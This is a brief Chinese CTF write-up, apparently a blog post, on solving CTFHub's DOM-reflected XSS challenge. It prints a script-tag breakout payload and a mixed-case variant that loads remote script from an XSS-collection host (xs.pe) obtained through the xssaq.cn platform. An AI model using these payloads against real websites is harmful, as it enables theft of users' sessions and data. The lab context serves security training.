根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
van久12 分钟前
Day27:菜单管理 + 动态路由(前端可直接用!)恋猫de小郭16 分钟前
DeepSeek V4 Flash 可以在 128GB 的 M3 Max 运行,还是 1M 上下文van久17 分钟前
企业级后台管理系统(结合前 4 周全部内容)详细需求文档 + 前端模板适配Lsx_27 分钟前
H5 嵌入微信 / 支付宝 / 抖音小程序 WebView:调用原生能力完整方案Cobyte32 分钟前
大模型 MCP 本质原理:从协议到代码实现cong_35 分钟前
狐蒂云🦊跑路我的摸鱼岛没了!kyriewen1136 分钟前
我开发的 Chrome 扒图浏览器插件又更新了❗Data_Journal39 分钟前
Puppeteer指纹识别指南:循序渐进,简单易学!晓得迷路了1 小时前
栗子前端技术周刊第 128 期 - Rolldown 1.0、Vitest、Node.js 26.0.0...金玉满堂@bj1 小时前
Gin 框架零基础全套入门教程(Go 企业级 Web 开发)